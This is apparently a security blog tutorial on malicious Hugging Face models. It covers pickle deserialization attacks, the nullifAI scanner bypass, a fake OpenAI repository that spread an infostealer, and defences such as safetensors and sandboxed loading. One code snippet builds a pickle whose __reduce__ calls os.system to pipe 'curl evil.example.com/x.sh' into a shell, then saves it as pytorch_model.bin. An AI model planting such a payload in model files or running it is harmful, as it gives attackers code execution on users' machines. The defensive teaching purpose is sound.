Hugging Face Malware Models: How to Spot & Avoid Them

A practical guide to the Hugging Face malware model problem: how pickle attacks work, the nullifAI bypass, the 244K-download fake OpenAI repo, and defenses that cover more than just the weights file.

Drew Sullivan2026-05-159 min readIntermediate

So you’re about to download a model from Hugging Face. You click the repo, see thousands of downloads, scan the README – looks legit. Then a question hits you: could this model actually run code on my machine when I load it?

The short answer: yes, depending on the format. And it’s not a hypothetical. A malicious Hugging Face repository posing as an OpenAI release delivered infostealer malware to Windows systems and logged 244,000 downloads before being removed. That’s the world a Hugging Face malware model now lives in – and most tutorials about this topic stop at “use safetensors instead of pickle,” which is good advice but nowhere near the full picture.

The story that should change how you download models

Open-OSS/privacy-filter. That was the repo name. It copied OpenAI’s Privacy Filter model card almost word-for-word – same description, same framing. The actual threat wasn’t inside the model weights at all. A file called loader.py sat right next to them, and that’s what did the damage.

According to HiddenLayer’s analysis (reported by CSO Online in late 2024), the repo hit the #1 trending position with approximately 244,000 downloads and 667 likes within 18 hours of going live. HiddenLayer suspects those numbers were artificially inflated to manufacture trust and push the repo into more download queues. Eighteen hours. Trending counters that look impressive are easy to fake.

This shifts the question from “is the .bin file safe?” to “is anything in this repo executable?” – a much harder problem to answer at a glance.

Why pickle is the original sin (and how it actually fires)

Most Hugging Face malware models trace back to one design choice: PyTorch serializes models with Python’s pickle module. Pickle is an official Python serialization format – it converts Python objects to byte streams and back. The Python documentation carries a prominent warning: “It is possible to construct malicious pickle data which will execute arbitrary code during unpickling.” That warning has been there for years. It hasn’t stopped anyone from shipping models in pickle format.

A real example, from JFrog’s analysis of baller423/goober2 (one of roughly 100 malicious models JFrog found on the Hub in early 2024): the malicious payload was injected using the __reduce__ method of the pickle module, which lets attackers insert arbitrary Python into the deserialization process. Here’s the conceptual shape of that injection:

import pickle, os

class Exploit:
 def __reduce__(self):
 # Whatever you return runs the moment someone calls pickle.load()
 return (os.system, ("curl evil.example.com/x.sh | sh",))

# Attacker bundles this into pytorch_model.bin
pickle.dump(Exploit(), open("pytorch_model.bin", "wb"))

No exploit. No buffer overflow. Just a normal language feature working as designed. The victim runs torch.load("pytorch_model.bin") and the OS call fires before a single tensor is read.

The nullifAI bypass: when the scanner says “all clear” and lies

Hugging Face does scan. It uses an open-source tool called Picklescan that implements a blacklist for dangerous methods – eval, exec, compile, open, and similar. A blacklist is a fine first line. It’s also a fine thing to bypass.

In February 2025, ReversingLabs published research on what they called nullifAI. Turns out the two malicious models they found were stored in PyTorch format but compressed with 7z instead of the ZIP format PyTorch normally uses. That single format change broke torch.load() – but it also broke Picklescan. The scanner errored out and walked away. Python kept reading.

The brutal part: the malicious payload was placed at the start of the pickle stream. Deserialization runs sequentially – so the reverse shell payload executed before parsing hit the broken byte and halted. By then, it was already calling out to a hardcoded IP address.

Hugging Face removed both models within 24 hours of ReversingLabs’ disclosure. Picklescan has since been patched to detect broken pickle files. But the lesson – blacklists are always one creative format trick away from useless – stays true regardless of patching.

Here’s the uncomfortable question this raises: how many other format quirks produce the same result? ZIP vs. 7z was the one that got caught. The answer is: we don’t fully know. Picklescan’s coverage is always bounded by what researchers have discovered and disclosed.

A safer download workflow (the part most guides skip)

Treat every Hugging Face repo as untrusted code, not just data. The model file is one attack surface. The Python files next to it are another – and that second surface is what the 244K-download infostealer actually used.

Prefer safetensors and force it. Safetensors stores only JSON metadata and raw binary tensor data – no Python objects, no executable code can be embedded. In transformers, pass use_safetensors=True. Per Hugging Face’s own security guidance (updated as of early 2025), this makes loading fail loudly rather than silently falling back to a pickle file.
Pin the revision. Don’t load org/model generically – load it with a specific revision="<commit-sha>". A repo can be edited after you reviewed it.
Never set trust_remote_code=True on a repo you haven’t read line-by-line. That flag runs the repo’s own Python files (modeling_*.py, configuration_*.py, loader.py) on your machine. See the blockquote below.
Sandbox the first load. Disposable container, no network egress, no mounted home directory. If something tries to phone home, you see it.
Check the repo, not the counters. Commit history, the uploader’s other repos, and the actual contents of any .py file matter far more than download numbers that can be inflated in hours.

The trust_remote_code trap: If a repo ships both a .safetensors file and a custom loader.py, ask yourself why the loader exists. Legitimate models rarely need one – the transformers library handles loading. A custom loader is a strong smell. More detail in the FAQ below.

Worth reading directly: Hugging Face’s Hub security documentation and the safetensors security overview on GitHub.

What the scanners catch – and what they don’t

Here’s how the layered defenses actually compare. The gap column is the one that matters.

Defense	What it stops	Known gap
Picklescan (HF default)	Common bad opcodes in well-formed pickles	Bypassed by 7z-compressed PyTorch archives (ReversingLabs, Feb 2025); blacklist-based, so novel opcode patterns aren’t caught until disclosed
“Unsafe” label on HF	Warns the user	HF marks files unsafe but does not block downloads – users can still retrieve and execute flagged models (per JFrog’s analysis, early 2024)
Safetensors format	Arbitrary code execution from the weights file itself	Doesn’t cover loader.py, modeling_*.py, README install commands, or anything outside the tensor file – the Open-OSS/privacy-filter attack lived entirely in this gap
ClamAV + third-party scans	Known-malware signatures	Novel payloads, encoded/obfuscated loaders, jsonkeeper-style C2 rotation

The safetensors format itself has been independently audited. Trail of Bits performed an external security review commissioned by Hugging Face, EleutherAI, and Stability AI (published May 2023). No critical flaw leading to arbitrary code execution was found. Some missing validation allowed polyglot files – that was fixed. The full blog post links the complete report if you want the detail.

Alternatives if you need a higher trust floor

Hugging Face is still the right default for most people. The Hub has real infrastructure behind it – malware scanning, pickle scanning, secrets scanning, MFA, and SOC 2 Type 2 certification (as of this writing). The problem isn’t Hugging Face’s diligence. Open-upload models will always have a gap between upload and scan.

A few options that close some of that gap:

Self-hosted artifact mirrors. Pull approved, pinned revisions into your own registry (JFrog Artifactory, an internal S3 bucket, etc.) and run your CI pipeline’s own scan before anything gets used downstream. Slower, but eliminates the “someone force-pushed the repo overnight” risk entirely.
GGUF via llama.cpp. The format doesn’t execute Python on load. That doesn’t make a malicious model behaviorally safe – but it removes the RCE-at-load-time vector.
Gated or organization-controlled repos. Hugging Face lets organizations restrict who can upload to a namespace. If you’re sourcing models for a team, pushing approved models into your own org repo with branch protection on limits the blast radius of a compromised upstream.

Frequently asked questions

Is it safe to download a Hugging Face model marked “unsafe”?

No. Full stop. The label means Picklescan found something dangerous and Hugging Face is letting you proceed at your own risk. Don’t.

Does using transformers’ `from_pretrained()` protect me automatically?

Partly – but the protection has a very specific shape. If the repo contains only safetensors weights and you pass use_safetensors=True, the tensor load itself is safe. The moment you add trust_remote_code=True, you’re telling transformers to import and execute whatever Python files the repo ships. That was the exact vector in the Open-OSS/privacy-filter campaign: the weights were fine. loader.py was the problem, and it ran because of how the model was invoked. Before enabling that flag, read every .py file in the repo. Every one.

What should I do if I already loaded a suspicious model?

Treat the machine as compromised. Pickle and trust_remote_code execute with your user’s full permissions – SSH keys, browser cookies, environment variables, cloud credentials, all of it was accessible. Disconnect from the network first. Then rotate every token that was on that machine (Hugging Face, AWS, OpenAI, GitHub – anything in your shell environment or ~/.aws). Image the disk before you wipe it. The infostealer in the Open-OSS/privacy-filter campaign specifically targeted Discord tokens, crypto wallets, and Chromium/Gecko browser data, so check those services too. When in doubt, assume the attacker got everything they could reach.

Next action: open the last Hugging Face repo you pulled. Check whether it loads from safetensors, whether you passed trust_remote_code=True, and whether there are any .py files you didn’t actually read. If the answers are no / yes / yes – start there.

The story that should change how you download models

Why pickle is the original sin (and how it actually fires)

The nullifAI bypass: when the scanner says “all clear” and lies

A safer download workflow (the part most guides skip)

What the scanners catch – and what they don’t

Alternatives if you need a higher trust floor

Frequently asked questions

Is it safe to download a Hugging Face model marked “unsafe”?

Does using transformers’ from_pretrained() protect me automatically?

What should I do if I already loaded a suspicious model?

Related Tutorials

E-Waste GPUs Benchmarked: What Actually Runs in 2026

Dating Apps Near Me: How AI Matching Actually Finds Local Humans (Not AI Companions)

Grindr App AI Features: A Practical Guide for 2026

Does using transformers’ `from_pretrained()` protect me automatically?